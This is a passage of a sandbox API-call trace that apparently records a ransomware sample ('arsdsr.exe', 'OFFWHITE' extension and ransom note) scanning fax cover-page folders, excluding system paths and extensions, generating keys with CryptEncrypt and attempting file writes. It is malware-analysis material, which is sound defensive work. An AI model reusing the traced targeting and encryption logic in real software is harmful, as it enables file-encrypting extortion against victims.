(lpString1=".cov", lpString2=".cab") returned 1 [0147.203] lstrcmpiW (lpString1=".cov", lpString2=".cmd") returned 1 [0147.203] lstrcmpiW (lpString1=".cov", lpString2=".com") returned 1 [0147.203] lstrcmpiW (lpString1=".cov", lpString2=".cpl") returned -1 [0147.203] lstrcmpiW (lpString1=".cov", lpString2=".ini") returned -1 [0147.203] lstrcmpiW (lpString1=".cov", lpString2=".dll") returned -1 [0147.203] lstrcmpiW (lpString1=".cov", lpString2=".url") returned -1 [0147.204] lstrcmpiW (lpString1=".cov", lpString2=".ttf") returned -1 [0147.204] lstrcmpiW (lpString1=".cov", lpString2=".mp3") returned -1 [0147.204] lstrcmpiW (lpString1=".cov", lpString2=".pif") returned -1 [0147.204] lstrcmpiW (lpString1=".cov", lpString2=".mp4") returned -1 [0147.204] lstrcmpiW (lpString1=".cov", lpString2=".OFFWHITE") returned -1 [0147.204] lstrcmpiW (lpString1=".cov", lpString2=".msi") returned -1 [0147.204] lstrcmpiW (lpString1="confident.cov", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.204] GetProcessHeap () returned 0x500000 [0147.204] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526b18 [0147.204] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\confident.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\confident.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.205] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=-4251595836) returned 0 [0147.205] GetProcessHeap () returned 0x500000 [0147.205] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a48 [0147.205] GetProcessHeap () returned 0x500000 [0147.205] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a60 [0147.205] GetProcessHeap () returned 0x500000 [0147.205] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565230 [0147.205] GetProcessHeap () returned 0x500000 [0147.205] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565338 [0147.205] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.205] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.206] SystemFunction036 (in: RandomBuffer=0x543a48, RandomBufferLength=0x10 | out: RandomBuffer=0x543a48) returned 1 [0147.206] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.206] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.206] SystemFunction036 (in: RandomBuffer=0x543a60, RandomBufferLength=0x10 | out: RandomBuffer=0x543a60) returned 1 [0147.206] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.206] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.206] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565230*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x565230*, pdwDataLen=0x295c910*=0x100) returned 1 [0147.206] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.206] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.206] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565338*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x565338*, pdwDataLen=0x295c90c*=0x100) returned 1 [0147.206] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295cbc4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0147.206] SetLastError (dwErrCode=0x0) [0147.206] WriteFile (in: hFile=0xffffffff, lpBuffer=0x565230, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0) returned 0 [0147.206] GetLastError () returned 0x6 [0147.207] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2a09, dwReserved0=0x880086, dwReserved1=0x295d670, cFileName="fyi.cov", cAlternateFileName="")) returned 1 [0147.207] lstrcmpiW (lpString1="fyi.cov", lpString2=".") returned 1 [0147.207] lstrcmpiW (lpString1="fyi.cov", lpString2="..") returned 1 [0147.207] lstrcmpiW (lpString1="fyi.cov", lpString2="...") returned 1 [0147.207] lstrcmpiW (lpString1="fyi.cov", lpString2="windows") returned -1 [0147.207] lstrcmpiW (lpString1="fyi.cov", lpString2="$recycle.bin") returned 1 [0147.207] lstrcmpiW (lpString1="fyi.cov", lpString2="rsa") returned -1 [0147.207] lstrcmpiW (lpString1="fyi.cov", lpString2="ntuser.dat") returned -1 [0147.207] lstrcmpiW (lpString1="fyi.cov", lpString2="programdata") returned -1 [0147.207] lstrcmpiW (lpString1="fyi.cov", lpString2="appdata") returned 1 [0147.207] lstrcmpiW (lpString1="fyi.cov", lpString2="program files") returned -1 [0147.207] lstrcmpiW (lpString1="fyi.cov", lpString2="program files (x86)") returned -1 [0147.207] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\" [0147.207] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\", lpString2="fyi.cov" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" [0147.207] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.207] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.207] PathFindExtensionW (pszPath="fyi.cov") returned=".cov" [0147.207] lstrcmpiW (lpString1=".cov", lpString2=".exe") returned -1 [0147.207] lstrcmpiW (lpString1=".cov", lpString2=".log") returned -1 [0147.207] lstrcmpiW (lpString1=".cov", lpString2=".cab") returned 1 [0147.207] lstrcmpiW (lpString1=".cov", lpString2=".cmd") returned 1 [0147.207] lstrcmpiW (lpString1=".cov", lpString2=".com") returned 1 [0147.207] lstrcmpiW (lpString1=".cov", lpString2=".cpl") returned -1 [0147.207] lstrcmpiW (lpString1=".cov", lpString2=".ini") returned -1 [0147.207] lstrcmpiW (lpString1=".cov", lpString2=".dll") returned -1 [0147.207] lstrcmpiW (lpString1=".cov", lpString2=".url") returned -1 [0147.208] lstrcmpiW (lpString1=".cov", lpString2=".ttf") returned -1 [0147.208] lstrcmpiW (lpString1=".cov", lpString2=".mp3") returned -1 [0147.208] lstrcmpiW (lpString1=".cov", lpString2=".pif") returned -1 [0147.208] lstrcmpiW (lpString1=".cov", lpString2=".mp4") returned -1 [0147.208] lstrcmpiW (lpString1=".cov", lpString2=".OFFWHITE") returned -1 [0147.208] lstrcmpiW (lpString1=".cov", lpString2=".msi") returned -1 [0147.208] lstrcmpiW (lpString1="fyi.cov", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.208] GetProcessHeap () returned 0x500000 [0147.208] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526b28 [0147.208] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\fyi.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\fyi.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.208] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=-4251595836) returned 0 [0147.208] GetProcessHeap () returned 0x500000 [0147.208] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a78 [0147.208] GetProcessHeap () returned 0x500000 [0147.208] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543a90 [0147.208] GetProcessHeap () returned 0x500000 [0147.208] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565440 [0147.208] GetProcessHeap () returned 0x500000 [0147.208] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565548 [0147.209] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.209] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.209] SystemFunction036 (in: RandomBuffer=0x543a78, RandomBufferLength=0x10 | out: RandomBuffer=0x543a78) returned 1 [0147.209] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.209] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.209] SystemFunction036 (in: RandomBuffer=0x543a90, RandomBufferLength=0x10 | out: RandomBuffer=0x543a90) returned 1 [0147.209] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.209] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.209] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565440*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x565440*, pdwDataLen=0x295c910*=0x100) returned 1 [0147.209] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.209] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.209] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565548*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x565548*, pdwDataLen=0x295c90c*=0x100) returned 1 [0147.209] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295cbc4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0147.210] SetLastError (dwErrCode=0x0) [0147.210] WriteFile (in: hFile=0xffffffff, lpBuffer=0x565440, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0) returned 0 [0147.210] GetLastError () returned 0x6 [0147.210] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3aa0, dwReserved0=0x880086, dwReserved1=0x295d670, cFileName="generic.cov", cAlternateFileName="")) returned 1 [0147.210] lstrcmpiW (lpString1="generic.cov", lpString2=".") returned 1 [0147.210] lstrcmpiW (lpString1="generic.cov", lpString2="..") returned 1 [0147.210] lstrcmpiW (lpString1="generic.cov", lpString2="...") returned 1 [0147.210] lstrcmpiW (lpString1="generic.cov", lpString2="windows") returned -1 [0147.210] lstrcmpiW (lpString1="generic.cov", lpString2="$recycle.bin") returned 1 [0147.210] lstrcmpiW (lpString1="generic.cov", lpString2="rsa") returned -1 [0147.210] lstrcmpiW (lpString1="generic.cov", lpString2="ntuser.dat") returned -1 [0147.210] lstrcmpiW (lpString1="generic.cov", lpString2="programdata") returned -1 [0147.210] lstrcmpiW (lpString1="generic.cov", lpString2="appdata") returned 1 [0147.210] lstrcmpiW (lpString1="generic.cov", lpString2="program files") returned -1 [0147.210] lstrcmpiW (lpString1="generic.cov", lpString2="program files (x86)") returned -1 [0147.210] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\" [0147.210] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\", lpString2="generic.cov" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" [0147.210] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.210] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.210] PathFindExtensionW (pszPath="generic.cov") returned=".cov" [0147.210] lstrcmpiW (lpString1=".cov", lpString2=".exe") returned -1 [0147.210] lstrcmpiW (lpString1=".cov", lpString2=".log") returned -1 [0147.210] lstrcmpiW (lpString1=".cov", lpString2=".cab") returned 1 [0147.210] lstrcmpiW (lpString1=".cov", lpString2=".cmd") returned 1 [0147.210] lstrcmpiW (lpString1=".cov", lpString2=".com") returned 1 [0147.210] lstrcmpiW (lpString1=".cov", lpString2=".cpl") returned -1 [0147.211] lstrcmpiW (lpString1=".cov", lpString2=".ini") returned -1 [0147.211] lstrcmpiW (lpString1=".cov", lpString2=".dll") returned -1 [0147.211] lstrcmpiW (lpString1=".cov", lpString2=".url") returned -1 [0147.211] lstrcmpiW (lpString1=".cov", lpString2=".ttf") returned -1 [0147.211] lstrcmpiW (lpString1=".cov", lpString2=".mp3") returned -1 [0147.211] lstrcmpiW (lpString1=".cov", lpString2=".pif") returned -1 [0147.211] lstrcmpiW (lpString1=".cov", lpString2=".mp4") returned -1 [0147.211] lstrcmpiW (lpString1=".cov", lpString2=".OFFWHITE") returned -1 [0147.211] lstrcmpiW (lpString1=".cov", lpString2=".msi") returned -1 [0147.211] lstrcmpiW (lpString1="generic.cov", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0147.211] GetProcessHeap () returned 0x500000 [0147.211] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526b38 [0147.211] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\generic.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\generic.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.211] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=-4251595836) returned 0 [0147.211] GetProcessHeap () returned 0x500000 [0147.211] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543aa8 [0147.211] GetProcessHeap () returned 0x500000 [0147.211] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543ac0 [0147.211] GetProcessHeap () returned 0x500000 [0147.211] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565650 [0147.212] GetProcessHeap () returned 0x500000 [0147.212] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565758 [0147.212] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.212] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.212] SystemFunction036 (in: RandomBuffer=0x543aa8, RandomBufferLength=0x10 | out: RandomBuffer=0x543aa8) returned 1 [0147.212] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.212] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.212] SystemFunction036 (in: RandomBuffer=0x543ac0, RandomBufferLength=0x10 | out: RandomBuffer=0x543ac0) returned 1 [0147.212] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.212] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.212] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565650*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x565650*, pdwDataLen=0x295c910*=0x100) returned 1 [0147.212] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.212] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.212] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565758*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x565758*, pdwDataLen=0x295c90c*=0x100) returned 1 [0147.212] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295cbc4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0147.212] SetLastError (dwErrCode=0x0) [0147.212] WriteFile (in: hFile=0xffffffff, lpBuffer=0x565650, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0) returned 0 [0147.213] GetLastError () returned 0x6 [0147.213] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2886, dwReserved0=0x880086, dwReserved1=0x295d670, cFileName="urgent.cov", cAlternateFileName="")) returned 1 [0147.213] lstrcmpiW (lpString1="urgent.cov", lpString2=".") returned 1 [0147.213] lstrcmpiW (lpString1="urgent.cov", lpString2="..") returned 1 [0147.213] lstrcmpiW (lpString1="urgent.cov", lpString2="...") returned 1 [0147.213] lstrcmpiW (lpString1="urgent.cov", lpString2="windows") returned -1 [0147.213] lstrcmpiW (lpString1="urgent.cov", lpString2="$recycle.bin") returned 1 [0147.213] lstrcmpiW (lpString1="urgent.cov", lpString2="rsa") returned 1 [0147.213] lstrcmpiW (lpString1="urgent.cov", lpString2="ntuser.dat") returned 1 [0147.213] lstrcmpiW (lpString1="urgent.cov", lpString2="programdata") returned 1 [0147.213] lstrcmpiW (lpString1="urgent.cov", lpString2="appdata") returned 1 [0147.213] lstrcmpiW (lpString1="urgent.cov", lpString2="program files") returned 1 [0147.213] lstrcmpiW (lpString1="urgent.cov", lpString2="program files (x86)") returned 1 [0147.213] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\" [0147.213] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\", lpString2="urgent.cov" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" [0147.213] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.213] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.213] PathFindExtensionW (pszPath="urgent.cov") returned=".cov" [0147.213] lstrcmpiW (lpString1=".cov", lpString2=".exe") returned -1 [0147.213] lstrcmpiW (lpString1=".cov", lpString2=".log") returned -1 [0147.213] lstrcmpiW (lpString1=".cov", lpString2=".cab") returned 1 [0147.213] lstrcmpiW (lpString1=".cov", lpString2=".cmd") returned 1 [0147.213] lstrcmpiW (lpString1=".cov", lpString2=".com") returned 1 [0147.213] lstrcmpiW (lpString1=".cov", lpString2=".cpl") returned -1 [0147.213] lstrcmpiW (lpString1=".cov", lpString2=".ini") returned -1 [0147.213] lstrcmpiW (lpString1=".cov", lpString2=".dll") returned -1 [0147.214] lstrcmpiW (lpString1=".cov", lpString2=".url") returned -1 [0147.214] lstrcmpiW (lpString1=".cov", lpString2=".ttf") returned -1 [0147.214] lstrcmpiW (lpString1=".cov", lpString2=".mp3") returned -1 [0147.214] lstrcmpiW (lpString1=".cov", lpString2=".pif") returned -1 [0147.214] lstrcmpiW (lpString1=".cov", lpString2=".mp4") returned -1 [0147.214] lstrcmpiW (lpString1=".cov", lpString2=".OFFWHITE") returned -1 [0147.214] lstrcmpiW (lpString1=".cov", lpString2=".msi") returned -1 [0147.214] lstrcmpiW (lpString1="urgent.cov", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0147.214] GetProcessHeap () returned 0x500000 [0147.214] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526b48 [0147.214] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\urgent.cov" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\urgent.cov"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.214] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=-4251595836) returned 0 [0147.214] GetProcessHeap () returned 0x500000 [0147.214] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543ad8 [0147.214] GetProcessHeap () returned 0x500000 [0147.214] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543af0 [0147.214] GetProcessHeap () returned 0x500000 [0147.214] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565860 [0147.214] GetProcessHeap () returned 0x500000 [0147.214] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565968 [0147.214] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.215] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.215] SystemFunction036 (in: RandomBuffer=0x543ad8, RandomBufferLength=0x10 | out: RandomBuffer=0x543ad8) returned 1 [0147.215] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.215] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.215] SystemFunction036 (in: RandomBuffer=0x543af0, RandomBufferLength=0x10 | out: RandomBuffer=0x543af0) returned 1 [0147.215] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.215] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.215] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565860*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x565860*, pdwDataLen=0x295c910*=0x100) returned 1 [0147.215] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.215] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.215] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565968*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x565968*, pdwDataLen=0x295c90c*=0x100) returned 1 [0147.215] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295cbc4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0147.215] SetLastError (dwErrCode=0x0) [0147.215] WriteFile (in: hFile=0xffffffff, lpBuffer=0x565860, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0) returned 0 [0147.215] GetLastError () returned 0x6 [0147.216] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2886, dwReserved0=0x880086, dwReserved1=0x295d670, cFileName="urgent.cov", cAlternateFileName="")) returned 0 [0147.216] FindClose (in: hFindFile=0x544790 | out: hFindFile=0x544790) returned 1 [0147.216] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x21cf2d38, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1d91b669, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295dcf0, cFileName="en-US", cAlternateFileName="")) returned 0 [0147.216] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0147.217] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x580056, dwReserved1=0x295e370, cFileName="Inbox", cAlternateFileName="")) returned 1 [0147.217] lstrcmpiW (lpString1="Inbox", lpString2=".") returned 1 [0147.217] lstrcmpiW (lpString1="Inbox", lpString2="..") returned 1 [0147.217] lstrcmpiW (lpString1="Inbox", lpString2="...") returned 1 [0147.217] lstrcmpiW (lpString1="Inbox", lpString2="windows") returned -1 [0147.217] lstrcmpiW (lpString1="Inbox", lpString2="$recycle.bin") returned 1 [0147.217] lstrcmpiW (lpString1="Inbox", lpString2="rsa") returned -1 [0147.217] lstrcmpiW (lpString1="Inbox", lpString2="ntuser.dat") returned -1 [0147.217] lstrcmpiW (lpString1="Inbox", lpString2="programdata") returned -1 [0147.217] lstrcmpiW (lpString1="Inbox", lpString2="appdata") returned 1 [0147.217] lstrcmpiW (lpString1="Inbox", lpString2="program files") returned -1 [0147.217] lstrcmpiW (lpString1="Inbox", lpString2="program files (x86)") returned -1 [0147.217] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\" [0147.217] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\", lpString2="Inbox" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox") returned="C:/Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Inbox" [0147.217] lstrcatW (in: lpString1="C:/Users\\All 